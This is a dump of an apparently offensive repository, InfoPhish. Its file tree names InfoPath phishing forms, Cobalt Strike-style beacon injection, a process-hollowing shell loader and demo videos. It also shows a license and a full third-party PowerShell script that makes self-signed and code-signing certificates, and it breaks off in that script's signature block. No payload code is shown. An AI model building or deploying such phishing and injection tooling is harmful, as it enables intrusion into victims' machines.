├── CalcPlease └── CalcPlease.xsn ├── CsPlease ├── CsPlease.xsn ├── CsProcessHollowPlease.xsn └── CsProcessHollowPleasePublished.xsn ├── Extras ├── file.PNG ├── hollow.PNG └── infopathfuture.jpg ├── HelloWorld └── HelloWorld.xsn ├── LICENSE ├── New-SelfSignedCertificateEx.ps1 ├── ProcessHollowing ├── LICENSE ├── ProcHollow.sln ├── ShellLoader │ ├── Loader.cs │ ├── Properties │ │ └── AssemblyInfo.cs │ └── ShellLoader.csproj └── TestApp │ ├── App.config │ ├── Program.cs │ ├── Properties │ └── AssemblyInfo.cs │ └── TestApp.csproj ├── README.md ├── Setup ├── dotNetFx35setup.exe ├── mu_intellitrace_collector_for_visual_studio_2012_x86_921040.exe └── vsta_setup.exe ├── The-Path-To-Info-We-Missed.pdf └── VideoExamples ├── CalcPlease-Example-Fail-mainc.7z ├── CalcPlease-Example-Win-mainc.7z ├── CsPlease-Beacon-Injection-mainc.7z ├── CsPlease-Beacon-ProcessHollow-mainc.7z └── HelloWorld-Example-mainc.7z /CalcPlease/CalcPlease.xsn: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/InfoPhish/2279867de87af26844cef4ec78a58c15d0a6e75f/CalcPlease/CalcPlease.xsn -------------------------------------------------------------------------------- /CsPlease/CsPlease.xsn: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/InfoPhish/2279867de87af26844cef4ec78a58c15d0a6e75f/CsPlease/CsPlease.xsn -------------------------------------------------------------------------------- /CsPlease/CsProcessHollowPlease.xsn: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/InfoPhish/2279867de87af26844cef4ec78a58c15d0a6e75f/CsPlease/CsProcessHollowPlease.xsn -------------------------------------------------------------------------------- /CsPlease/CsProcessHollowPleasePublished.xsn: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/InfoPhish/2279867de87af26844cef4ec78a58c15d0a6e75f/CsPlease/CsProcessHollowPleasePublished.xsn -------------------------------------------------------------------------------- /Extras/file.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/InfoPhish/2279867de87af26844cef4ec78a58c15d0a6e75f/Extras/file.PNG -------------------------------------------------------------------------------- /Extras/hollow.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/InfoPhish/2279867de87af26844cef4ec78a58c15d0a6e75f/Extras/hollow.PNG -------------------------------------------------------------------------------- /Extras/infopathfuture.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/InfoPhish/2279867de87af26844cef4ec78a58c15d0a6e75f/Extras/infopathfuture.jpg -------------------------------------------------------------------------------- /HelloWorld/HelloWorld.xsn: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/obscuritylabs/InfoPhish/2279867de87af26844cef4ec78a58c15d0a6e75f/HelloWorld/HelloWorld.xsn -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License 2 | 3 | Copyright (c) 2017, InfoPhish 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | * Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | * Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | * Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | -------------------------------------------------------------------------------- /New-SelfSignedCertificateEx.ps1: -------------------------------------------------------------------------------- 1 | ##################################################################### 2 | # New-SelfSignedCertificateEx.ps1 3 | # Version 1.2 4 | # 5 | # Creates self-signed certificate. This tool is a base replacement 6 | # for deprecated makecert.exe 7 | # 8 | # Vadims Podans (c) 2013 - 2016 9 | # http://en-us.sysadmins.lv/ 10 | ##################################################################### 11 | #requires -Version 2.0 12 | 13 | function New-SelfSignedCertificateEx { 14 | <# 15 | .Synopsis 16 | This cmdlet generates a self-signed certificate. 17 | .Description 18 | This cmdlet generates a self-signed certificate with the required data. 19 | .Parameter Subject 20 | Specifies the certificate subject in a X500 distinguished name format. 21 | Example: CN=Test Cert, OU=Sandbox 22 | .Parameter NotBefore 23 | Specifies the date and time when the certificate become valid. By default previous day 24 | date is used. 25 | .Parameter NotAfter 26 | Specifies the date and time when the certificate expires. By default, the certificate is 27 | valid for 1 year. 28 | .Parameter SerialNumber 29 | Specifies the desired serial number in a hex format. 30 | Example: 01a4ff2 31 | .Parameter ProviderName 32 | Specifies the Cryptography Service Provider (CSP) name. You can use either legacy CSP 33 | and Key Storage Providers (KSP). By default "Microsoft Enhanced Cryptographic Provider v1.0" 34 | CSP is used. 35 | .Parameter AlgorithmName 36 | Specifies the public key algorithm. By default RSA algorithm is used. RSA is the only 37 | algorithm supported by legacy CSPs. With key storage providers (KSP) you can use CNG 38 | algorithms, like ECDH. For CNG algorithms you must use full name: 39 | ECDH_P256 40 | ECDH_P384 41 | ECDH_P521 42 | 43 | In addition, KeyLength parameter must be specified explicitly when non-RSA algorithm is used. 44 | .Parameter KeyLength 45 | Specifies the key length to generate. By default 2048-bit key is generated. 46 | .Parameter KeySpec 47 | Specifies the public key operations type. The possible values are: Exchange and Signature. 48 | Default value is Exchange. 49 | .Parameter EnhancedKeyUsage 50 | Specifies the intended uses of the public key contained in a certificate. You can 51 | specify either, EKU friendly name (for example 'Server Authentication') or 52 | object identifier (OID) value (for example '1.3.6.1.5.5.7.3.1'). 53 | .Parameter KeyUsages 54 | Specifies restrictions on the operations that can be performed by the public key contained in the certificate. 55 | Possible values (and their respective integer values to make bitwise operations) are: 56 | EncipherOnly 57 | CrlSign 58 | KeyCertSign 59 | KeyAgreement 60 | DataEncipherment 61 | KeyEncipherment 62 | NonRepudiation 63 | DigitalSignature 64 | DecipherOnly 65 | 66 | you can combine key usages values by using bitwise OR operation. when combining multiple 67 | flags, they must be enclosed in quotes and separated by a comma character. For example, 68 | to combine KeyEncipherment and DigitalSignature flags you should type: 69 | "KeyEncipherment, DigitalSignature". 70 | 71 | If the certificate is CA certificate (see IsCA parameter), key usages extension is generated 72 | automatically with the following key usages: Certificate Signing, Off-line CRL Signing, CRL Signing. 73 | .Parameter SubjectAlternativeName 74 | Specifies alternative names for the subject. Unlike Subject field, this extension 75 | allows to specify more than one name. Also, multiple types of alternative names 76 | are supported. The cmdlet supports the following SAN types: 77 | RFC822 Name 78 | IP address (both, IPv4 and IPv6) 79 | Guid 80 | Directory name 81 | DNS name 82 | .Parameter IsCA 83 | Specifies whether the certificate is CA (IsCA = $true) or end entity (IsCA = $false) 84 | certificate. If this parameter is set to $false, PathLength parameter is ignored. 85 | Basic Constraints extension is marked as critical. 86 | .PathLength 87 | Specifies the number of additional CA certificates in the chain under this certificate. If 88 | PathLength parameter is set to zero, then no additional (subordinate) CA certificates are 89 | permitted under this CA. 90 | .CustomExtension 91 | Specifies the custom extension to include to a self-signed certificate. This parameter 92 | must not be used to specify the extension that is supported via other parameters. In order 93 | to use this parameter, the extension must be formed in a collection of initialized 94 | System.Security.Cryptography.X509Certificates.X509Extension objects. 95 | .Parameter SignatureAlgorithm 96 | Specifies signature algorithm used to sign the certificate. By default 'SHA1' 97 | algorithm is used. 98 | .Parameter FriendlyName 99 | Specifies friendly name for the certificate. 100 | .Parameter StoreLocation 101 | Specifies the store location to store self-signed certificate. Possible values are: 102 | 'CurrentUser' and 'LocalMachine'. 'CurrentUser' store is intended for user certificates 103 | and computer (as well as CA) certificates must be stored in 'LocalMachine' store. 104 | .Parameter StoreName 105 | Specifies the container name in the certificate store. Possible container names are: 106 | AddressBook 107 | AuthRoot 108 | CertificateAuthority 109 | Disallowed 110 | My 111 | Root 112 | TrustedPeople 113 | TrustedPublisher 114 | .Parameter Path 115 | Specifies the path to a PFX file to export a self-signed certificate. 116 | .Parameter Password 117 | Specifies the password for PFX file. 118 | .Parameter AllowSMIME 119 | Enables Secure/Multipurpose Internet Mail Extensions for the certificate. 120 | .Parameter Exportable 121 | Marks private key as exportable. Smart card providers usually do not allow 122 | exportable keys. 123 | .Example 124 | New-SelfsignedCertificateEx -Subject "CN=Test Code Signing" -EKU "Code Signing" -KeySpec "Signature" ` 125 | -KeyUsage "DigitalSignature" -FriendlyName "Test code signing" -NotAfter $([datetime]::now.AddYears(5)) 126 | 127 | Creates a self-signed certificate intended for code signing and which is valid for 5 years. Certificate 128 | is saved in the Personal store of the current user account. 129 | .Example 130 | New-SelfsignedCertificateEx -Subject "CN=www.domain.com" -EKU "Server Authentication", "Client authentication" ` 131 | -KeyUsage "KeyEcipherment, DigitalSignature" -SAN "sub.domain.com","www.domain.com","192.168.1.1" ` 132 | -AllowSMIME -Path C:\test\ssl.pfx -Password (ConvertTo-SecureString "P@ssw0rd" -AsPlainText -Force) -Exportable ` 133 | -StoreLocation "LocalMachine" 134 | 135 | Creates a self-signed SSL certificate with multiple subject names and saves it to a file. Additionally, the 136 | certificate is saved in the Personal store of the Local Machine store. Private key is marked as exportable, 137 | so you can export the certificate with a associated private key to a file at any time. The certificate 138 | includes SMIME capabilities. 139 | .Example 140 | New-SelfsignedCertificateEx -Subject "CN=www.domain.com" -EKU "Server Authentication", "Client authentication" ` 141 | -KeyUsage "KeyEcipherment, DigitalSignature" -SAN "sub.domain.com","www.domain.com","192.168.1.1" ` 142 | -StoreLocation "LocalMachine" -ProviderName "Microsoft Software Key Storae Provider" -AlgorithmName ecdh_256 ` 143 | -KeyLength 256 -SignatureAlgorithm sha256 144 | 145 | Creates a self-signed SSL certificate with multiple subject names and saves it to a file. Additionally, the 146 | certificate is saved in the Personal store of the Local Machine store. Private key is marked as exportable, 147 | so you can export the certificate with a associated private key to a file at any time. Certificate uses 148 | Ellyptic Curve Cryptography (ECC) key algorithm ECDH with 256-bit key. The certificate is signed by using 149 | SHA256 algorithm. 150 | .Example 151 | New-SelfsignedCertificateEx -Subject "CN=Test Root CA, OU=Sandbox" -IsCA $true -ProviderName ` 152 | "Microsoft Software Key Storage Provider" -Exportable 153 | 154 | Creates self-signed root CA certificate. 155 | #> 156 | [OutputType('[System.Security.Cryptography.X509Certificates.X509Certificate2]')] 157 | [CmdletBinding(DefaultParameterSetName = '__store')] 158 | param ( 159 | [Parameter(Mandatory = $true, Position = 0)] 160 | [string]$Subject, 161 | [Parameter(Position = 1)] 162 | [datetime]$NotBefore = [DateTime]::Now.AddDays(-1), 163 | [Parameter(Position = 2)] 164 | [datetime]$NotAfter = $NotBefore.AddDays(365), 165 | [string]$SerialNumber, 166 | [Alias('CSP')] 167 | [string]$ProviderName = "Microsoft Enhanced Cryptographic Provider v1.0", 168 | [string]$AlgorithmName = "RSA", 169 | [int]$KeyLength = 2048, 170 | [validateSet("Exchange","Signature")] 171 | [string]$KeySpec = "Exchange", 172 | [Alias('EKU')] 173 | [Security.Cryptography.Oid[]]$EnhancedKeyUsage, 174 | [Alias('KU')] 175 | [Security.Cryptography.X509Certificates.X509KeyUsageFlags]$KeyUsage, 176 | [Alias('SAN')] 177 | [String[]]$SubjectAlternativeName, 178 | [bool]$IsCA, 179 | [int]$PathLength = -1, 180 | [Security.Cryptography.X509Certificates.X509ExtensionCollection]$CustomExtension, 181 | [ValidateSet('MD5','SHA1','SHA256','SHA384','SHA512')] 182 | [string]$SignatureAlgorithm = "SHA1", 183 | [string]$FriendlyName, 184 | [Parameter(ParameterSetName = '__store')] 185 | [Security.Cryptography.X509Certificates.StoreLocation]$StoreLocation = "CurrentUser", 186 | [Parameter(Mandatory = $true, ParameterSetName = '__file')] 187 | [Alias('OutFile','OutPath','Out')] 188 | [IO.FileInfo]$Path, 189 | [Parameter(Mandatory = $true, ParameterSetName = '__file')] 190 | [Security.SecureString]$Password, 191 | [switch]$AllowSMIME, 192 | [switch]$Exportable 193 | ) 194 | $ErrorActionPreference = "Stop" 195 | if ([Environment]::OSVersion.Version.Major -lt 6) { 196 | $NotSupported = New-Object NotSupportedException -ArgumentList "Windows XP and Windows Server 2003 are not supported!" 197 | throw $NotSupported 198 | } 199 | $ExtensionsToAdd = @() 200 | 201 | #region constants 202 | # contexts 203 | New-Variable -Name UserContext -Value 0x1 -Option Constant 204 | New-Variable -Name MachineContext -Value 0x2 -Option Constant 205 | # encoding 206 | New-Variable -Name Base64Header -Value 0x0 -Option Constant 207 | New-Variable -Name Base64 -Value 0x1 -Option Constant 208 | New-Variable -Name Binary -Value 0x3 -Option Constant 209 | New-Variable -Name Base64RequestHeader -Value 0x4 -Option Constant 210 | # SANs 211 | New-Variable -Name OtherName -Value 0x1 -Option Constant 212 | New-Variable -Name RFC822Name -Value 0x2 -Option Constant 213 | New-Variable -Name DNSName -Value 0x3 -Option Constant 214 | New-Variable -Name DirectoryName -Value 0x5 -Option Constant 215 | New-Variable -Name URL -Value 0x7 -Option Constant 216 | New-Variable -Name IPAddress -Value 0x8 -Option Constant 217 | New-Variable -Name RegisteredID -Value 0x9 -Option Constant 218 | New-Variable -Name Guid -Value 0xa -Option Constant 219 | New-Variable -Name UPN -Value 0xb -Option Constant 220 | # installation options 221 | New-Variable -Name AllowNone -Value 0x0 -Option Constant 222 | New-Variable -Name AllowNoOutstandingRequest -Value 0x1 -Option Constant 223 | New-Variable -Name AllowUntrustedCertificate -Value 0x2 -Option Constant 224 | New-Variable -Name AllowUntrustedRoot -Value 0x4 -Option Constant 225 | # PFX export options 226 | New-Variable -Name PFXExportEEOnly -Value 0x0 -Option Constant 227 | New-Variable -Name PFXExportChainNoRoot -Value 0x1 -Option Constant 228 | New-Variable -Name PFXExportChainWithRoot -Value 0x2 -Option Constant 229 | #endregion 230 | 231 | #region Subject processing 232 | # http://msdn.microsoft.com/en-us/library/aa377051(VS.85).aspx 233 | $SubjectDN = New-Object -ComObject X509Enrollment.CX500DistinguishedName 234 | $SubjectDN.Encode($Subject, 0x0) 235 | #endregion 236 | 237 | #region Extensions 238 | 239 | #region Enhanced Key Usages processing 240 | if ($EnhancedKeyUsage) { 241 | $OIDs = New-Object -ComObject X509Enrollment.CObjectIDs 242 | $EnhancedKeyUsage | ForEach-Object { 243 | $OID = New-Object -ComObject X509Enrollment.CObjectID 244 | $OID.InitializeFromValue($_.Value) 245 | # http://msdn.microsoft.com/en-us/library/aa376785(VS.85).aspx 246 | $OIDs.Add($OID) 247 | } 248 | # http://msdn.microsoft.com/en-us/library/aa378132(VS.85).aspx 249 | $EKU = New-Object -ComObject X509Enrollment.CX509ExtensionEnhancedKeyUsage 250 | $EKU.InitializeEncode($OIDs) 251 | $ExtensionsToAdd += "EKU" 252 | } 253 | #endregion 254 | 255 | #region Key Usages processing 256 | if ($KeyUsage -ne $null) { 257 | $KU = New-Object -ComObject X509Enrollment.CX509ExtensionKeyUsage 258 | $KU.InitializeEncode([int]$KeyUsage) 259 | $KU.Critical = $true 260 | $ExtensionsToAdd += "KU" 261 | } 262 | #endregion 263 | 264 | #region Basic Constraints processing 265 | if ($PSBoundParameters.Keys.Contains("IsCA")) { 266 | # http://msdn.microsoft.com/en-us/library/aa378108(v=vs.85).aspx 267 | $BasicConstraints = New-Object -ComObject X509Enrollment.CX509ExtensionBasicConstraints 268 | if (!$IsCA) {$PathLength = -1} 269 | $BasicConstraints.InitializeEncode($IsCA,$PathLength) 270 | $BasicConstraints.Critical = $IsCA 271 | $ExtensionsToAdd += "BasicConstraints" 272 | } 273 | #endregion 274 | 275 | #region SAN processing 276 | if ($SubjectAlternativeName) { 277 | $SAN = New-Object -ComObject X509Enrollment.CX509ExtensionAlternativeNames 278 | $Names = New-Object -ComObject X509Enrollment.CAlternativeNames 279 | foreach ($altname in $SubjectAlternativeName) { 280 | $Name = New-Object -ComObject X509Enrollment.CAlternativeName 281 | if ($altname.Contains("@")) { 282 | $Name.InitializeFromString($RFC822Name,$altname) 283 | } else { 284 | try { 285 | $Bytes = [Net.IPAddress]::Parse($altname).GetAddressBytes() 286 | $Name.InitializeFromRawData($IPAddress,$Base64,[Convert]::ToBase64String($Bytes)) 287 | } catch { 288 | try { 289 | $Bytes = [Guid]::Parse($altname).ToByteArray() 290 | $Name.InitializeFromRawData($Guid,$Base64,[Convert]::ToBase64String($Bytes)) 291 | } catch { 292 | try { 293 | $Bytes = ([Security.Cryptography.X509Certificates.X500DistinguishedName]$altname).RawData 294 | $Name.InitializeFromRawData($DirectoryName,$Base64,[Convert]::ToBase64String($Bytes)) 295 | } catch {$Name.InitializeFromString($DNSName,$altname)} 296 | } 297 | } 298 | } 299 | $Names.Add($Name) 300 | } 301 | $SAN.InitializeEncode($Names) 302 | $ExtensionsToAdd += "SAN" 303 | } 304 | #endregion 305 | 306 | #region Custom Extensions 307 | if ($CustomExtension) { 308 | $count = 0 309 | foreach ($ext in $CustomExtension) { 310 | # http://msdn.microsoft.com/en-us/library/aa378077(v=vs.85).aspx 311 | $Extension = New-Object -ComObject X509Enrollment.CX509Extension 312 | $EOID = New-Object -ComObject X509Enrollment.CObjectId 313 | $EOID.InitializeFromValue($ext.Oid.Value) 314 | $EValue = [Convert]::ToBase64String($ext.RawData) 315 | $Extension.Initialize($EOID,$Base64,$EValue) 316 | $Extension.Critical = $ext.Critical 317 | New-Variable -Name ("ext" + $count) -Value $Extension 318 | $ExtensionsToAdd += ("ext" + $count) 319 | $count++ 320 | } 321 | } 322 | #endregion 323 | 324 | #endregion 325 | 326 | #region Private Key 327 | # http://msdn.microsoft.com/en-us/library/aa378921(VS.85).aspx 328 | $PrivateKey = New-Object -ComObject X509Enrollment.CX509PrivateKey 329 | $PrivateKey.ProviderName = $ProviderName 330 | $AlgID = New-Object -ComObject X509Enrollment.CObjectId 331 | $AlgID.InitializeFromValue(([Security.Cryptography.Oid]$AlgorithmName).Value) 332 | $PrivateKey.Algorithm = $AlgID 333 | # http://msdn.microsoft.com/en-us/library/aa379409(VS.85).aspx 334 | $PrivateKey.KeySpec = switch ($KeySpec) {"Exchange" {1}; "Signature" {2}} 335 | $PrivateKey.Length = $KeyLength 336 | # key will be stored in current user certificate store 337 | switch ($PSCmdlet.ParameterSetName) { 338 | '__store' { 339 | $PrivateKey.MachineContext = if ($StoreLocation -eq "LocalMachine") {$true} else {$false} 340 | } 341 | '__file' { 342 | $PrivateKey.MachineContext = $false 343 | } 344 | } 345 | $PrivateKey.ExportPolicy = if ($Exportable) {1} else {0} 346 | $PrivateKey.Create() 347 | #endregion 348 | 349 | # http://msdn.microsoft.com/en-us/library/aa377124(VS.85).aspx 350 | $Cert = New-Object -ComObject X509Enrollment.CX509CertificateRequestCertificate 351 | if ($PrivateKey.MachineContext) { 352 | $Cert.InitializeFromPrivateKey($MachineContext,$PrivateKey,"") 353 | } else { 354 | $Cert.InitializeFromPrivateKey($UserContext,$PrivateKey,"") 355 | } 356 | $Cert.Subject = $SubjectDN 357 | $Cert.Issuer = $Cert.Subject 358 | $Cert.NotBefore = $NotBefore 359 | $Cert.NotAfter = $NotAfter 360 | foreach ($item in $ExtensionsToAdd) {$Cert.X509Extensions.Add((Get-Variable -Name $item -ValueOnly))} 361 | if (![string]::IsNullOrEmpty($SerialNumber)) { 362 | if ($SerialNumber -match "[^0-9a-fA-F]") {throw "Invalid serial number specified."} 363 | if ($SerialNumber.Length % 2) {$SerialNumber = "0" + $SerialNumber} 364 | $Bytes = $SerialNumber -split "(.{2})" | Where-Object {$_} | ForEach-Object{[Convert]::ToByte($_,16)} 365 | $ByteString = [Convert]::ToBase64String($Bytes) 366 | $Cert.SerialNumber.InvokeSet($ByteString,1) 367 | } 368 | if ($AllowSMIME) {$Cert.SmimeCapabilities = $true} 369 | $SigOID = New-Object -ComObject X509Enrollment.CObjectId 370 | $SigOID.InitializeFromValue(([Security.Cryptography.Oid]$SignatureAlgorithm).Value) 371 | $Cert.SignatureInformation.HashAlgorithm = $SigOID 372 | # completing certificate request template building 373 | $Cert.Encode() 374 | 375 | # interface: http://msdn.microsoft.com/en-us/library/aa377809(VS.85).aspx 376 | $Request = New-Object -ComObject X509Enrollment.CX509enrollment 377 | $Request.InitializeFromRequest($Cert) 378 | $Request.CertificateFriendlyName = $FriendlyName 379 | $endCert = $Request.CreateRequest($Base64) 380 | $Request.InstallResponse($AllowUntrustedCertificate,$endCert,$Base64,"") 381 | switch ($PSCmdlet.ParameterSetName) { 382 | '__file' { 383 | $PFXString = $Request.CreatePFX( 384 | [Runtime.InteropServices.Marshal]::PtrToStringAuto([Runtime.InteropServices.Marshal]::SecureStringToBSTR($Password)), 385 | $PFXExportEEOnly, 386 | $Base64 387 | ) 388 | Set-Content -Path $Path -Value ([Convert]::FromBase64String($PFXString)) -Encoding Byte 389 | } 390 | } 391 | [Byte[]]$CertBytes = [Convert]::FromBase64String($endCert) 392 | New-Object Security.Cryptography.X509Certificates.X509Certificate2 @(,$CertBytes) 393 | } 394 | # SIG # Begin signature block 395 | # MIIcgAYJKoZIhvcNAQcCoIIccTCCHG0CAQExDzANBglghkgBZQMEAgEFADB5Bgor 396 | # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG 397 | # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCAmMWwZnveROeiP 398 | # Okrv0onByV5n94ickqih9JS7E9E/HKCCF4owggUTMIID+6ADAgECAhABn3Jtjtqs 399 | # sQ4D4Fge9iqaMA0GCSqGSIb3DQEBCwUAMHIxCzAJBgNVBAYTAlVTMRUwEwYDVQQK 400 | # EwxEaWdpQ2VydCBJbmMxGTAXBgNVBAsTEHd3dy5kaWdpY2VydC5jb20xMTAvBgNV 401 | # BAMTKERpZ2lDZXJ0IFNIQTIgQXNzdXJlZCBJRCBDb2RlIFNpZ25pbmcgQ0EwHhcN 402 | # MTUxMjE4MDAwMDAwWhcNMTYxMjIyMTIwMDAwWjBQMQswCQYDVQQGEwJMVjENMAsG 403 | # A1UEBxMEUmlnYTEYMBYGA1UEChMPU3lzYWRtaW5zIExWIElLMRgwFgYDVQQDEw9T 404 | # eXNhZG1pbnMgTFYgSUswggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDo 405 | # UVviPttwGnu8WAEbA2zvYj3+eJLxrpWtcokvyZALEd8hf7m19yCIruChB3b3Cszt 406 | # OMjgV+a4MoPNEjMdnbFVstO+nCxbh/J1W6ArjqEIaYX6H4ZJNwfFD7S22JNeKHW7 407 | # /Z//jdsPSTRvSugWuGFzix0DxdfTDATuq10J6ivi1Tk9DZJpMfEKMnz6ze24UfJU 408 | # FX1XxcbeDgTdK2nd1RGAMKnxYQhn4Gzv+TrbLJWs976aLR/tJ8td4UqtlK/BE0PB 409 | # S3G7Xb4dNjm4e1nVFz7FNf6DqQQ34ZDk+XgVVQINxNbB2WmkOMEJFX2G3+F539d4 410 | # V6EfRAF0+v1U9Ofm1m6TAgMBAAGjggHFMIIBwTAfBgNVHSMEGDAWgBRaxLl7Kgqj 411 | # pepxA8Bg+S32ZXUOWDAdBgNVHQ4EFgQU/3BF2aoFQv5rK3jP1wW8I1t/uoMwDgYD 412 | # VR0PAQH/BAQDAgeAMBMGA1UdJQQMMAoGCCsGAQUFBwMDMHcGA1UdHwRwMG4wNaAz 413 | # oDGGL2h0dHA6Ly9jcmwzLmRpZ2ljZXJ0LmNvbS9zaGEyLWFzc3VyZWQtY3MtZzEu 414 | # Y3JsMDWgM6Axhi9odHRwOi8vY3JsNC5kaWdpY2VydC5jb20vc2hhMi1hc3N1cmVk 415 | # LWNzLWcxLmNybDBMBgNVHSAERTBDMDcGCWCGSAGG/WwDATAqMCgGCCsGAQUFBwIB 416 | # FhxodHRwczovL3d3dy5kaWdpY2VydC5jb20vQ1BTMAgGBmeBDAEEATCBhAYIKwYB 417 | # BQUHAQEEeDB2MCQGCCsGAQUFBzABhhhodHRwOi8vb2NzcC5kaWdpY2VydC5jb20w 418 | # TgYIKwYBBQUHMAKGQmh0dHA6Ly9jYWNlcnRzLmRpZ2ljZXJ0LmNvbS9EaWdpQ2Vy 419 | # dFNIQTJBc3N1cmVkSURDb2RlU2lnbmluZ0NBLmNydDAMBgNVHRMBAf8EAjAAMA0G 420 | # CSqGSIb3DQEBCwUAA4IBAQBRqP0FyPMXdmGf4C+ubIeHSeFRcunS6kFdyokn8tKK 421 | # HFqAvea8QCmdFqMPTTet0WK/2O8RiiscWADDbmyHTC9KMNOufeabWtNCbwwaBeg0 422 | # xir8eo2deX1JVWfji4ZdwHTlqJR5hnCM+i1iD60zWOx7+8WAF6toCs5O1+CDqt5P 423 | # hvv0Re0Y17DeFWe9NNanOdy/t+cpTuJZmX3TR5dhRZJTMZZnTdzi4qTWIAaRX4m/ 424 | # fUehKfBwd5pzoZwlZ0RC/5RnRMpdUtankwKPdrSjLPSObJwDwxoZvZwpAKhwm1wa 425 | # 49Rv1bHg/r090IrClnAUA6Os1PJAYRWMU8ayMMQuM496MIIFMDCCBBigAwIBAgIQ 426 | # BAkYG1/Vu2Z1U0O1b5VQCDANBgkqhkiG9w0BAQsFADBlMQswCQYDVQQGEwJVUzEV 427 | # MBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3d3cuZGlnaWNlcnQuY29t 428 | # MSQwIgYDVQQDExtEaWdpQ2VydCBBc3N1cmVkIElEIFJvb3QgQ0EwHhcNMTMxMDIy 429 | # MTIwMDAwWhcNMjgxMDIyMTIwMDAwWjByMQswCQYDVQQGEwJVUzEVMBMGA1UEChMM 430 | # RGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3d3cuZGlnaWNlcnQuY29tMTEwLwYDVQQD 431 | # EyhEaWdpQ2VydCBTSEEyIEFzc3VyZWQgSUQgQ29kZSBTaWduaW5nIENBMIIBIjAN 432 | # BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA+NOzHH8OEa9ndwfTCzFJGc/Q+0WZ 433 | # sTrbRPV/5aid2zLXcep2nQUut4/6kkPApfmJ1DcZ17aq8JyGpdglrA55KDp+6dFn 434 | # 08b7KSfH03sjlOSRI5aQd4L5oYQjZhJUM1B0sSgmuyRpwsJS8hRniolF1C2ho+mI 435 | # LCCVrhxKhwjfDPXiTWAYvqrEsq5wMWYzcT6scKKrzn/pfMuSoeU7MRzP6vIK5Fe7 436 | # SrXpdOYr/mzLfnQ5Ng2Q7+S1TqSp6moKq4TzrGdOtcT3jNEgJSPrCGQ+UpbB8g8S 437 | # 9MWOD8Gi6CxR93O8vYWxYoNzQYIH5DiLanMg0A9kczyen6Yzqf0Z3yWT0QIDAQAB 438 | # o4IBzTCCAckwEgYDVR0TAQH/BAgwBgEB/wIBADAOBgNVHQ8BAf8EBAMCAYYwEwYD 439 | # VR0lBAwwCgYIKwYBBQUHAwMweQYIKwYBBQUHAQEEbTBrMCQGCCsGAQUFBzABhhho 440 | # dHRwOi8vb2NzcC5kaWdpY2VydC5jb20wQwYIKwYBBQUHMAKGN2h0dHA6Ly9jYWNl 441 | # cnRzLmRpZ2ljZXJ0LmNvbS9EaWdpQ2VydEFzc3VyZWRJRFJvb3RDQS5jcnQwgYEG 442 | # A1UdHwR6MHgwOqA4oDaGNGh0dHA6Ly9jcmw0LmRpZ2ljZXJ0LmNvbS9EaWdpQ2Vy 443 | # dEFzc3VyZWRJRFJvb3RDQS5jcmwwOqA4oDaGNGh0dHA6Ly9jcmwzLmRpZ2ljZXJ0 444 | # LmNvbS9EaWdpQ2VydEFzc3VyZWRJRFJvb3RDQS5jcmwwTwYDVR0gBEgwRjA4Bgpg 445 | # hkgBhv1sAAIEMCowKAYIKwYBBQUHAgEWHGh0dHBzOi8vd3d3LmRpZ2ljZXJ0LmNv 446 | # bS9DUFMwCgYIYIZIAYb9bAMwHQYDVR0OBBYEFFrEuXsqCqOl6nEDwGD5LfZldQ5Y 447 | # MB8GA1UdIwQYMBaAFEXroq/0ksuCMS1Ri6enIZ3zbcgPMA0GCSqGSIb3DQEBCwUA 448 | # A4IBAQA+7A1aJLPzItEVyCx8JSl2qB1dHC06GsTvMGHXfgtg/cM9D8Svi/3vKt8g 449 | # VTew4fbRknUPUbRupY5a4l4kgU4QpO4/cY5jDhNLrddfRHnzNhQGivecRk5c/5Cx 450 | # GwcOkRX7uq+1UcKNJK4kxscnKqEpKBo6cSgCPC6Ro8AlEeKcFEehemhor5unXCBc 451 | # 2XGxDI+7qPjFEmifz0DLQESlE/DmZAwlCEIysjaKJAL+L3J+HNdJRZboWR3p+nRk 452 | # 